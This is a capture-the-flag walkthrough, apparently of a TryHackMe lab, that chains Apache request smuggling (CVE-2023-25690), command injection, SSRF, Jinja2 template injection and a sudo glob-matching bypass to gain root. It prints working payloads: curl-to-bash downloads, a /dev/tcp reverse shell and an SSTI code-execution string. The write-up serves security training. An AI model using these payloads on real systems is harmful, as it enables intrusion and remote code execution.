IP#

10.201.63.47

RECON#

1
$ nmap -T4 -n -sC -sV -Pn -p- 10.201.63.47
2
PORT   STATE SERVICE VERSION
3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
4
| ssh-hostkey:
5
|   3072 41:ed:cf:46:58:c8:5d:41:04:0a:32:a0:10:4a:83:3b (RSA)
6
|   256 e8:f9:24:5b:e4:b0:37:4f:00:9d:5c:d3:fb:54:65:0a (ECDSA)
7
|_  256 57:fd:4a:1b:12:ac:7c:90:80:88:b8:5a:5b:78:30:79 (ED25519)
8
80/tcp open  http    Apache httpd 2.4.55 ((Unix))
9
| http-methods:
10
|_  Potentially risky methods: TRACE
11
|_http-server-header: Apache/2.4.55 (Unix)
12
|_http-title: Site doesn't have a title (text/html).
13
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ports Open#

There are two ports open:

22 (SSH)
80 (HTTP)

Web 80#

Upon accessing http://10.201.63.47/, the site presents a static Coming Soon page, which includes a navigational link directing users to /page/home.html.

alt text

Navigating to http://10.201.63.47/page/home.html displays only a message indicating that the password generator is currently unavailable, with no additional content present.

alt text

A notable observation, which may prove relevant later, is that the response headers reveal the presence of two distinct Apache2 servers.

1. http://10.201.63.47/

In home page it was running on Server:

Apache/2.4.55 (Unix)
1. http://10.201.63.47/page/home.html

In /page/home.html it was running on Server:

Apache/2.4.54 (Debian)

X-Powered-By:

PHP/7.4.33

Foothold#

Web Application Analysis#

Initial fuzzing of the webroot did not yield any notable results. However, targeting the /page/ endpoint for potential files revealed an unusual behavior: all responses consistently returned a 200 OK status.

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ ffuf -u 'http://10.201.63.47/page/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -mc all -t 100 -ic -fc 404 -e .php,/
3
...
4
09.php                  [Status: 200, Size: 148, Words: 19, Lines: 3, Duration: 129ms]
5
09                      [Status: 200, Size: 144, Words: 19, Lines: 3, Duration: 137ms]
6
images.php              [Status: 200, Size: 152, Words: 19, Lines: 3, Duration: 112ms]
7
...

Upon inspecting one of these responses, a peculiar behavior is observed: any input provided after /page/ in the URL appears to be directly passed to the readfile() function within /var/www/html/index.php.

Bypassing a test string and providing the path to a valid file (using double URL encoding) confirms that the readfile() function successfully retrieves the file contents, allowing arbitrary file reads. Furthermore, leveraging wrappers such as http:// enables external requests to be made and their responses read, exposing a Server-Side Request Forgery (SSRF) vulnerability.

Let see /etc/passwd

NOTE
we should encode this becoz dangerous string, may be blocked. after encode you will get %252Fetc%252Fpasswd

Exploiting this vulnerability for reconnaissance and making targeted requests reveals that the application is running within a Docker container. Apart from noting that the Apache2 server is listening on *:8080 via its configuration, there is little of immediate value.

Resuming fuzzing of the /page/ endpoint, this time with the -fw 19 option to ignore readfile() errors, uncovers two noteworthy files: index.php and gen.php.

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ ffuf -u 'http://10.201.63.47/page/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -mc all -t 100 -ic -fc 404 -e .php,/ -fw 19
3
...
4
index.php               [Status: 200, Size: 148, Words: 17, Lines: 11, Duration: 135ms]
5
gen.php                 [Status: 200, Size: 392, Words: 65, Lines: 15, Duration: 127ms]

Analysis of /page/gen.php reveals a straightforward PHP script that accepts a length parameter via POST and forwards it directly to the exec() function, introducing a command injection vulnerability.

alt text

Reviewing /page/index.php confirms that this script underlies the file read and request functionality. It extracts the page parameter from the GET request and passes it directly to readfile(). Interestingly, requests to /page/* are still processed successfully, despite the script being designed to accept the parameter explicitly via a GET variable.

alt text

Request Tunneling#

At this stage, the available findings suggest that the application relies on a two-tier setup. The frontend Apache2 server intercepts requests and, when the URL begins with /page/, it extracts the subsequent content and proxies the request to a backend Apache2 instance. This backend hosts index.php and gen.php, with the proxied request taking the form: http://backend:8080/index.php?page=* This mechanism prevents direct access to gen.php on the backend.

Despite this restriction, index.php remains accessible, allowing the readfile() function to be invoked with arbitrary input. Leveraging this, it is possible to request backend resources such as http://127.0.0.1:8080/gen.php. However, the readfile() function only issues GET requests, limiting interaction with gen.php to retrieval only. Since exploiting the command injection vulnerability in gen.php requires a POST request, this creates a barrier to direct exploitation.

encoded : http%253a%252f%252f127.0.0.1%253a8080%252fgen.php

Investigating how the proxying behavior may be configured in Apache2 suggests that it is likely implemented using mod_proxy, with a configuration resembling the following:

1
ProxyPass "/page/" "http://backend:8080/"
2
ProxyPassReverse "/page/" "http://backend:8080/"

HTTP Request Smuggling via mod_proxy (CVE-2023-25690)#

Recon indicates a front-end Apache HTTP Server (mod_proxy) forwarding paths beginning with /page/ to a back-end Apache instance. The proxy constructs target URLs as:

http://backend:8080/index.php?page=<suffix> In Apache 2.4.55, a configuration like this is vulnerable to CRLF injection CVE-2023-25690, enabling HTTP request smuggling.

Observed Behavior#

Input appended after /page/ is reflected in the back-end request line processed by index.php.
CRLF characters (\r\n) can be injected to make the back end interpret a single front-end request as multiple requests.

Example (sanitized): Front-end request:

1
GET /page/test HTTP/1.1
2
Host: 10.201.92.207

Back-end receives:

1
GET /index.php?page=test HTTP/1.1
2
Host: backend

With CRLF injection (illustrative):

1
GET /page/test%0D%0AHost:%20localhost%0D%0A%0D%0AGET%20/smuggled HTTP/1.1
2
Host: 10.201.92.207

Back-end interprets as two requests:

1
GET /index.php?page=test HTTP/1.1
2
Host: localhost
3

4
GET /smuggled HTTP/1.1
5
Host: backend

Impact#

The back-end gen.php can be reached via a smuggled POST request, enabling command injection if input is unsafely passed to exec().
This provides a potential remote code execution vector within the container.

Sanitized smuggled POST illustration:#

1
POST /gen.php HTTP/1.1
2
Host: localhost
3
Content-Type: application/x-www-form-urlencoded
4
Content-Length: <length>
5

6
length=<user_input>

Conditions Required#

Apache 2.4.55 (or similar vulnerable version) with mod_proxy path rewriting.
Back-end endpoint reachable only via the proxy and unsafe input handling.
CRLF not blocked at the front end.

Remediation#

Upgrade Apache to a patched version.
Harden proxy rules: avoid concatenating untrusted path segments.
Sanitize inputs in all back-end scripts (remove exec, validate parameters).
Block CR/LF in URLs or headers.
Enforce access controls to sensitive back-end endpoints.
Monitor for unusual multi-request sequences via WAF/IDS.
Risk Rating: High (exploitation could lead to full container compromise).

Example Diagram :#

1
+----------------+        /page/ request         +----------------+
2
| Front-end      |-----------------------------> | Back-end       |
3
| Apache2        |                                 Apache2         |
4
| (10.201.92.207) |                                 (127.0.0.1:8080)|
5
+----------------+                                 +----------------+
6
       |                                                  |
7
       | GET /page/test                                   |
8
       |------------------------------------------------->|
9
       |                                                  |
10
       |                                      GET /index.php?page=test
11
       |                                      Host: backend
12
       |                                                  |
13
       | CRLF injection:                                  |
14
       | test%0D%0AHost: localhost%0D%0A%0D%0AGET /smuggled |
15
       |------------------------------------------------->|
16
       |                                                  |
17
       |                                GET /index.php?page=test
18
       |                                Host: localhost
19
       |                                                  |
20
       |                                GET /smuggled HTTP/1.1
21
       |                                Host: backend
22
       |                                                  |
23
       +--------------------------------------------------+

lets use this payload :

1
test HTTP/1.1
2
Host: localhost
3

4
POST /gen.php HTTP/1.1
5
Host: localhost
6
Content-Type: application/x-www-form-urlencoded
7
Content-Length: 31
8

9
length=;curl 10.14.xxx.xx|bash;
10

11
GET /test

encoded as :

1
test%20HTTP/1.1%0D%0AHost:%20localhost%0D%0A%0D%0APOST%20/gen.php%20HTTP/1.1%0D%0AHost:%20localhost%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2031%0D%0A%0D%0Alength=;curl%20<ip>%7Cbash;%0D%0A%0D%0AGET%20/test

reverse shell payload on our web server:#

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ cat index.html
3
/bin/bash -i >& /dev/tcp/10.4.19.136/443 0>&1
4
┌──(kali㉿kali)-[~/Desktop]
5
└─$ python3 -m http.server 80
6
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

alt text

now lets inject our payload and we got a web shell

Shell as hansolo – Network Scanning#

After gaining a foothold, the container’s IP is identified as 172.18.0.3. Performing a network scan from within the container using RustScan reveals an unusual open port on the host machine at 172.18.0.1:5000. This indicates a potential service on the host that may be reachable from the container and warrants further enumeration.

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ nc -lvnp 443
3
listening on [any] 443 ...
4
connect to [10.4.19.136] from (UNKNOWN) [10.201.92.207] 37618
5
bash: cannot set terminal process group (1): Inappropriate ioctl for device
6
bash: no job control in this shell
7
www-data@124a042cc76c:/var/www/html$ script -qc /bin/bash /dev/null
8
script -qc /bin/bash /dev/null
9
www-data@124a042cc76c:/var/www/html$ ^Z
10
zsh: suspended  nc -lvnp 443
11

12
┌──(kali㉿kali)-[~/Desktop]
13
└─$ stty raw -echo; fg
14
[1]  + continued  nc -lvnp 443
15

16
www-data@124a042cc76c:/var/www/html$ export TERM=xterm
17
www-data@124a042cc76c:/var/www/html$ hostname -i
18
172.18.0.3
19
www-data@124a042cc76c:/tmp$ curl -s http://<ip>/rustscan -o rustscan
20
www-data@124a042cc76c:/tmp$ chmod +x rustscan
21
www-data@124a042cc76c:/tmp$ ./rustscan --top -a 172.18.0.1,172.18.0.2 --accessible
22
Open 172.18.0.1:22
23
Open 172.18.0.1:80
24
Open 172.18.0.2:80
25
Open 172.18.0.1:5000

Server-Side Request Forgery (SSRF)#

Accessing http://172.18.0.1:5000/ from the container using curl reveals a web interface containing a form that accepts URLs via POST requests. This indicates the host is performing server-side requests on behalf of user-supplied input, presenting a potential SSRF attack vector.

alt text

1
www-data@124a042cc76c:/var/www/html$ curl -s http://172.18.0.1:5000/
2
<!DOCTYPE html>
3
<html>
4
<head>
5
    <title>Website Display</title>
6
</head>
7
<body>
8
    <h1>Fetch Website Content</h1>
9
    <h2>Currently in Development</h2>
10
    <form method="POST">
11
        <label for="website_url">Enter Website URL:</label>
12
        <input type="text" name="website_url" id="website_url" required>
13
        <button type="submit">Fetch Website</button>
14
    </form>
15
    <div>
16

17
    </div>
18
</body>
19
</html>

NOTE

Testing it with a request and giving the URL for our own machine:

1
www-data@124a042cc76c:/var/www/html$ curl -s -d 'website_url=http://10.4.19.136/'  http://172.18.0.1:5000/

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ nc -lvnp 80
3
listening on [any] 80 ...
4
connect to [10.4.19.136] from (UNKNOWN) [10.201.92.207] 33826
5
GET / HTTP/1.1
6
Host: 10.4.19.136
7
User-Agent: PycURL/7.45.2 libcurl/7.68.0 OpenSSL/1.1.1f zlib/1.2.11 brotli/1.0.7 libidn2/2.2.0 libpsl/0.21.0 (+libidn2/2.2.0) libssh/0.9.3/openssl/zlib nghttp2/1.40.0 librtmp/2.3
8
Accept: */*

alt text

Testing further, we can confirm it not only makes the request but also displays the response it receives.

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ echo 'PWNCRAFTS' > test.txt
3

4
┌──(kali㉿kali)-[~/Desktop]
5
└─$ python3 -m http.server 80
6
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
7
10.201.92.207 - - [21/Aug/2025 02:02:19] "GET /test.txt HTTP/1.1" 200 -

1
www-data@124a042cc76c:/var/www/html$  curl -s -d 'website_url=http://10.4.19.136/test.txt'  http://172.18.0.1:5000/
2

3
        <!DOCTYPE html>
4
<html>
5
<head>
6
    <title>Website Display</title>
7
</head>
8
<body>
9
    <h1>Fetch Website Content</h1>
10
    <h2>Currently in Development</h2>
11
    <form method="POST">
12
        <label for="website_url">Enter Website URL:</label>
13
        <input type="text" name="website_url" id="website_url" required>
14
        <button type="submit">Fetch Website</button>
15
    </form>
16
    <div>
17
        PWNCRAFTS
18

19
    </div>
20
</body>
21
</html>www-data@124a042cc76c:/var/www/html$

alt text

The service uses PycURL, which supports the file:// protocol. This allows local file access on the host. Using this mechanism to read /etc/passwd confirms the presence of the hansolo user as well as the root account, indicating potential targets for privilege escalation.

1
curl -s -d 'website_url=file:///etc/passwd' http://172.18.0.1:5000/

alt text

1
www-data@124a042cc76c:/var/www/html$ curl -s -d 'website_url=file:///etc/passwd'
2
curl: no URL specified!cc76c:/var/www/html$ curl -s -d 'website_url=file:///etc/passwd'
3
curl: try 'curl --help' or 'curl --manual' for more information
4
 http://172.18.0.1:5000/ar/www/html$ curl -s -d 'website_url=file:///etc/passwd'
5

6
        <!DOCTYPE html>
7
<html>
8
<head>
9
    <title>Website Display</title>
10
</head>
11
<body>
12
    <h1>Fetch Website Content</h1>
13
    <h2>Currently in Development</h2>
14
    <form method="POST">
15
        <label for="website_url">Enter Website URL:</label>
16
        <input type="text" name="website_url" id="website_url" required>
17
        <button type="submit">Fetch Website</button>
18
    </form>
19
    <div>
20
        root:x:0:0:root:/root:/bin/bash
21
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
22
bin:x:2:2:bin:/bin:/usr/sbin/nologin
23
sys:x:3:3:sys:/dev:/usr/sbin/nologin
24
sync:x:4:65534:sync:/bin:/bin/sync
25
games:x:5:60:games:/usr/games:/usr/sbin/nologin
26
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
27
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
28
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
29
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
30
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
31
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
32
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
33
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
34
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
35
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
36
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
37
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
38
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
39
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
40
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
41
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
42
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
43
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
44
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
45
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
46
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
47
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
48
pollinate:x:110:1::/var/cache/pollinate:/bin/false
49
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
50
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
51
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
52
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
53
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
54
hansolo:x:1000:1000::/home/hansolo:/bin/bash
55

56
    </div>
57
</body>
58
</html>www-data@124a042cc76c:/var/www/html$

we have user : hansolo

Inspecting /proc/self/status reveals that the application process is running under the hansolo user account. This confirms the current privilege level within the container.

1
curl -s -d 'website_url=file:///proc/self/status' http://172.18.0.1:5000/

1
www-data@124a042cc76c:/var/www/html$ curl -s -d 'website_url=file:///proc/self/status' http://172.18.0.1:5000/
2

3
        <!DOCTYPE html>
4
<html>
5
<head>
6
    <title>Website Display</title>
7
</head>
8
<body>
9
    <h1>Fetch Website Content</h1>
10
    <h2>Currently in Development</h2>
11
    <form method="POST">
12
        <label for="website_url">Enter Website URL:</label>
13
        <input type="text" name="website_url" id="website_url" required>
14
        <button type="submit">Fetch Website</button>
15
    </form>
16
    <div>
17
        Name:   python3
18
Umask:  0002
19
State:  S (sleeping)
20
Tgid:   726
21
Ngid:   0
22
Pid:    726
23
PPid:   725
24
TracerPid:      0
25
Uid:    1000    1000    1000    1000
26
Gid:    1000    1000    1000    1000
27
FDSize: 64
28
Groups: 1000
29
NStgid: 726
30
NSpid:  726
31
NSpgid: 725
32
NSsid:  725
33
VmPeak:   189028 kB
34
VmSize:   124112 kB
35
VmLck:         0 kB
36
VmPin:         0 kB
37
VmHWM:     36440 kB
38
VmRSS:     36436 kB
39
RssAnon:           20856 kB
40
RssFile:           15580 kB
41
RssShmem:              0 kB
42
VmData:    38372 kB
43
VmStk:       132 kB
44
VmExe:      2644 kB
45
VmLib:     12288 kB
46
VmPTE:       144 kB
47
VmSwap:        0 kB
48
HugetlbPages:          0 kB
49
CoreDumping:    0
50
THP_enabled:    1
51
Threads:        2
52
SigQ:   0/15197
53
SigPnd: 0000000000000000
54
ShdPnd: 0000000000000000
55
SigBlk: 0000000000000000
56
SigIgn: 0000000001001000
57
SigCgt: 0000000180000002
58
CapInh: 0000000000000000
59
CapPrm: 0000000000000000
60
CapEff: 0000000000000000
61
CapBnd: 000001ffffffffff
62
CapAmb: 0000000000000000
63
NoNewPrivs:     0
64
Seccomp:        0
65
Seccomp_filters:        0
66
Speculation_Store_Bypass:       vulnerable
67
SpeculationIndirectBranch:      always enabled
68
Cpus_allowed:   3
69
Cpus_allowed_list:      0-1
70
Mems_allowed:   00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001
71
Mems_allowed_list:      0
72
voluntary_ctxt_switches:        6378
73
nonvoluntary_ctxt_switches:     55
74

75
    </div>
76
</body>
77
</html>www-data@124a042cc76c:/var/www/html$

After initial attempts to access sensitive files like SSH keys prove unfruitful, the next step is to analyze the application’s source code to understand its functionality. The executable path can be retrieved from /proc/self/cmdline, providing a starting point for source code enumeration.

Clear Diagram#

1
          ┌───────────────────────┐
2
          │  Web App /gen.php     │
3
          │  running inside       │
4
          │  container            │
5
          └─────────┬─────────────┘
6
                    │
7
         Sends a request with:
8
         website_url=file:///proc/self/status
9
                    │
10
                    ▼
11
          ┌───────────────────────┐
12
          │ Linux Kernel exposes  │
13
          │ process info under    │
14
          │ /proc/self/           │
15
          └─────────┬─────────────┘
16
                    │
17
   /proc/self/status contains:
18
   ┌─────────────────────────────┐
19
   │ Name:   python3              │
20
   │ State:  S (sleeping)         │
21
   │ Pid:    726                  │
22
   │ PPid:   725                  │
23
   │ Uid:    1000    1000 1000 1000 │  ← Key info
24
   │ Gid:    1000    1000 1000 1000 │
25
   └─────────────────────────────┘
26
                    │
27
   Kernel returns content to web app
28
                    │
29
                    ▼
30
          ┌───────────────────────┐
31
          │ Output displayed by  │
32
          │ web app to attacker  │
33
          └─────────┬─────────────┘
34
                    │
35
     Attacker reads the **Uid** value:
36
       1000 → maps to user `hansolo` in /etc/passwd
37
                    │
38
                    ▼
39
           ┌─────────────────────┐
40
           │ Attacker now knows  │
41
           │ the process runs as │
42
           │ user hansolo        │
43
           └─────────────────────┘

1
www-data@124a042cc76c:/var/www/html$ curl -s -d 'website_url=file:///proc/self/cmdline' http://172.18.0.1:5000/ -o-
2

3

4
        <!DOCTYPE html>
5
<html>
6
<head>
7
    <title>Website Display</title>
8
</head>
9
<body>
10
    <h1>Fetch Website Content</h1>
11
    <h2>Currently in Development</h2>
12
    <form method="POST">
13
        <label for="website_url">Enter Website URL:</label>
14
        <input type="text" name="website_url" id="website_url" required>
15
        <button type="submit">Fetch Website</button>
16
    </form>
17
    <div>
18
        /usr/bin/python3/home/hansolo/app/app.py
19
    </div>
20
</body>
21
</html>www-data@124a042cc76c:/var/www/html$

Now, lets read /home/hansolo/app/app.py source code.

1
www-data@124a042cc76c:/var/www/html$ curl -s -d 'website_url=file:///home/hansolo/app/app.py' http://172.18.0.1:5000/
2

3
        <!DOCTYPE html>
4
<html>
5
<head>
6
    <title>Website Display</title>
7
</head>
8
<body>
9
    <h1>Fetch Website Content</h1>
10
    <h2>Currently in Development</h2>
11
    <form method="POST">
12
        <label for="website_url">Enter Website URL:</label>
13
        <input type="text" name="website_url" id="website_url" required>
14
        <button type="submit">Fetch Website</button>
15
    </form>
16
    <div>
17
        from flask import Flask, render_template, render_template_string, request
18
import pycurl
19
from io import BytesIO
20

21
app = Flask(__name__)
22

23
@app.route('/', methods=['GET', 'POST'])
24
def display_website():
25
    if request.method == 'POST':
26
        website_url = request.form['website_url']
27

28
        # Use pycurl to fetch the content of the website
29
        buffer = BytesIO()
30
        c = pycurl.Curl()
31
        c.setopt(c.URL, website_url)
32
        c.setopt(c.WRITEDATA, buffer)
33
        c.perform()
34
        c.close()
35

36
        # Extract the content and convert it to a string
37
        content = buffer.getvalue().decode('utf-8')
38
        buffer.close()
39
        website_content = '''
40
        <!DOCTYPE html>
41
<html>
42
<head>
43
    <title>Website Display</title>
44
</head>
45
<body>
46
    <h1>Fetch Website Content</h1>
47
    <h2>Currently in Development</h2>
48
    <form method="POST">
49
        <label for="website_url">Enter Website URL:</label>
50
        <input type="text" name="website_url" id="website_url" required>
51
        <button type="submit">Fetch Website</button>
52
    </form>
53
    <div>
54
        %s
55
    </div>
56
</body>
57
</html>'''%content
58

59
        return render_template_string(website_content)
60

61
    return render_template('index.html')
62

63
if __name__ == '__main__':
64
    app.run(host="0.0.0.0",debug=False)
65

66
    </div>
67
</body>
68
</html>www-data@124a042cc76c:/var/www/html$

1
from flask import Flask, render_template, render_template_string, request
2
import pycurl
3
from io import BytesIO
4

5
app = Flask(__name__)
6

7
@app.route('/', methods=['GET', 'POST'])
8
def display_website():
9
    if request.method == 'POST':
10
        website_url = request.form['website_url']
11

12
        # Use pycurl to fetch the content of the website
13
        buffer = BytesIO()
14
        c = pycurl.Curl()
15
        c.setopt(c.URL, website_url)
16
        c.setopt(c.WRITEDATA, buffer)
17
        c.perform()
18
        c.close()
19

20
        # Extract the content and convert it to a string
21
        content = buffer.getvalue().decode('utf-8')
22
        buffer.close()
23
        website_content = '''
24
        <!DOCTYPE html>
25
<html>
26
<head>
27
    <title>Website Display</title>
28
</head>
29
<body>
30
    <h1>Fetch Website Content</h1>
31
    <h2>Currently in Development</h2>
32
    <form method="POST">
33
        <label for="website_url">Enter Website URL:</label>
34
        <input type="text" name="website_url" id="website_url" required>
35
        <button type="submit">Fetch Website</button>
36
    </form>
37
    <div>
38
        %s
39
    </div>
40
</body>
41
</html>'''%content
42

43
        return render_template_string(website_content)
44

45
    return render_template('index.html')
46

47
if __name__ == '__main__':
48
    app.run(host="0.0.0.0",debug=False)

Server-Side Template Injection (SSTI)#

Analysis of the source code reveals a simple Flask application. On a POST request:

The application retrieves a URL from the website_url parameter.
It fetches the content of that URL using PycURL.
The fetched content is assigned to website_content and passed directly to render_template_string.

Vulnerability:#

User-controlled URLs allow an attacker to inject arbitrary content into website_content.
Because this content is processed by Jinja2 through render_template_string, an attacker can achieve Server-Side Template Injection (SSTI).

Illustrative Example:#

If an attacker hosts a file containing a malicious Jinja2 template, submitting its URL via the website_url parameter would cause the template to be rendered on the server, executing arbitrary template code.

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ cat template
3
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl 10.4.19.136|bash').read() }}
4

5
┌──(kali㉿kali)-[~/Desktop]
6
└─$

When we make the site fetch it, the response would be a template that would be formatted into the HTML code present in the application code and would get passed to render_template_string and executed.

1
www-data@124a042cc76c:/var/www/html$ curl -s -d 'website_url=http://10.4.19.136/template'  http://172.18.0.1:5000/
2

3
        <!DOCTYPE html>
4
<html>
5
<head>
6
    <title>Website Display</title>
7
</head>
8
<body>
9
    <h1>Fetch Website Content</h1>
10
    <h2>Currently in Development</h2>
11
    <form method="POST">
12
        <label for="website_url">Enter Website URL:</label>
13
        <input type="text" name="website_url" id="website_url" required>
14
        <button type="submit">Fetch Website</button>
15
    </form>
16
    <div>
17

18

19
    </div>
20
</body>
21
</html>www-data@124a042cc76c:/var/www/html$

alt text

now lets turn on listener and execute the same cmd curl -s -d 'website_url=http://10.4.19.136/template' http://172.18.0.1:5000/, we obtain a shell as the hansolo user and can read the first flag.

alt text

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ nc -lvnp 443
3
listening on [any] 443 ...
4
connect to [10.4.19.136] from (UNKNOWN) [10.201.92.207] 54278
5
bash: cannot set terminal process group (725): Inappropriate ioctl for device
6
bash: no job control in this shell
7
hansolo@contrabando:~$ python3 -c 'import pty;pty.spawn("/bin/bash");'
8
python3 -c 'import pty;pty.spawn("/bin/bash");'
9
hansolo@contrabando:~$ export TERM=xterm
10
export TERM=xterm
11
hansolo@contrabando:~$ ^Z
12
zsh: suspended  nc -lvnp 443
13

14
┌──(kali㉿kali)-[~/Desktop]
15
└─$ stty raw -echo; fg
16
[1]  + continued  nc -lvnp 443
17

18
hansolo@contrabando:~$ ls
19
app  hansolo_userflag.txt
20
hansolo@contrabando:~$ cat hansolo_userflag.txt
21
THM{Th3_BeST_xxxx_xxx_xxxxxxx
22
hansolo@contrabando:~$

Shell as root – Sudo Privileges#

Examining the sudo capabilities for the hansolo user reveals two commands executable as root without providing the user’s password:

1
hansolo@contrabando:~$ sudo -l
2
Matching Defaults entries for hansolo on contrabando:
3
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
4

5
User hansolo may run the following commands on contrabando:
6
    (root) NOPASSWD: /usr/bin/bash /usr/bin/vault
7
    (root) /usr/bin/python* /opt/generator/app.py

alt text

/usr/bin/bash /usr/bin/vault – can be executed directly as root.
/usr/bin/python* /opt/generator/app.py – requires knowledge of the hansolo user password to run as root.

Brute-Forcing the Password#

To execute the second root-level command (/usr/bin/python* /opt/generator/app.py), the hansolo user password is required. Before attempting brute force, we first examine the /usr/bin/vault script, which can be executed as root without a password, to identify potential hints or mechanisms that could reveal or assist in obtaining the password.

1
hansolo@contrabando:~$ cat /usr/bin/vault
2
#!/bin/bash
3

4
check () {
5
        if [ ! -e "$file_to_check" ]; then
6
            /usr/bin/echo "File does not exist."
7
            exit 1
8
        fi
9
        compare
10
}
11

12

13
compare () {
14
        content=$(/usr/bin/cat "$file_to_check")
15

16
        read -s -p "Enter the required input: " user_input
17

18
        if [[ $content == $user_input ]]; then
19
            /usr/bin/echo ""
20
            /usr/bin/echo "Password matched!"
21
            /usr/bin/cat "$file_to_print"
22
        else
23
            /usr/bin/echo "Password does not match!"
24
        fi
25
}
26

27
file_to_check="/root/password"
28
file_to_print="/root/secrets"
29

30
check
31
hansolo@contrabando:~$

we have /usr/bin/vault

1
#!/bin/bash
2

3
check () {
4
        if [ ! -e "$file_to_check" ]; then
5
            /usr/bin/echo "File does not exist."
6
            exit 1
7
        fi
8
        compare
9
}
10

11

12
compare () {
13
        content=$(/usr/bin/cat "$file_to_check")
14

15
        read -s -p "Enter the required input: " user_input
16

17
        if [[ $content == $user_input ]]; then
18
            /usr/bin/echo ""
19
            /usr/bin/echo "Password matched!"
20
            /usr/bin/cat "$file_to_print"
21
        else
22
            /usr/bin/echo "Password does not match!"
23
        fi
24
}
25

26
file_to_check="/root/password"
27
file_to_print="/root/secrets"
28

29
check

Looking at the script, we can see a vulnerability in the if [[ $content == $user_input ]]; then line, as the $user_input parameter which is read from the user is not quoted. This allows us to use glob matching in the comparison as such:

1
$ user_input="*"; if [[ "password" == "$user_input" ]]; then echo "TRUE"; else echo "FALSE"; fi
2
FALSE
3

4
$ user_input="*"; if [[ "password" == $user_input ]]; then echo "TRUE"; else echo "FALSE"; fi
5
TRUE

Exploiting this by entering * as our input, we are able to bypass the check and access the contents of /root/secrets, though it provides no useful information.

1
hansolo@contrabando:~$ sudo /usr/bin/bash /usr/bin/vault
2
Enter the required input: *
3
Password matched!
4
1. Lightsaber Colors: Lightsabers in Star Wars can come in various colors, and the color often signifies the Jedi's role or affiliation. For example, blue and green lightsabers are commonly associated with Jedi Knights, while red lightsabers are typically used by Sith. However, there are exceptions, and the color can also represent other factors.
5

6
2. Darth Vader's Breathing: The iconic sound of Darth Vader's breathing was created by sound designer Ben Burtt. He achieved this effect by recording himself breathing through a scuba regulator. The sound became one of the most recognizable and menacing elements of the character.
7

8
3. Ewok Language: The Ewoks, the small furry creatures from the forest moon of Endor in "Return of the Jedi," speak a language called Ewokese. The language is a combination of various Tibetan, Nepalese, and Kalmyk phrases, as well as some manipulated dialogue from the Quechua language.
9

10
4. Han Solo's Carbonite Freeze: In "Star Wars: Episode V - The Empire Strikes Back," Han Solo is frozen in carbonite. The famous line, "I love you," "I know," was actually improvised by Harrison Ford. The original script had Han responding with "I love you too," but Ford felt that Han's character wouldn't say that, so he ad-libbed the now-famous line.
11

12
5. Yoda's Species and Name: Yoda's species and homeworld are never revealed in the Star Wars films, and George Lucas has been adamant about keeping this information a mystery. Additionally, the name "Yoda" was chosen simply because George Lucas liked the sound of it.
13
hansolo@contrabando:~$

Rather than merely bypassing the check, the script’s glob pattern matching can be leveraged to brute-force the value of the $content parameter, which is read from /root/password. By iterating over possible characters, prepending each to a wildcard (*), and observing the script’s behavior, it is possible to progressively reconstruct the password.

example :

1
for char in charset:
2
    test_pattern = char + '*'
3
    run vault script with $content = test_pattern
4
    if script behaves as expected:
5
        append char to known_password

1
$ user_input="a*"; if [[ "password" == $user_input ]]; then echo "TRUE"; else echo "FALSE"; fi
2
FALSE
3
...
4

5
$ user_input="p*"; if [[ "password" == $user_input ]]; then echo "TRUE"; else echo "FALSE"; fi
6
TRUE
7
...
8

9
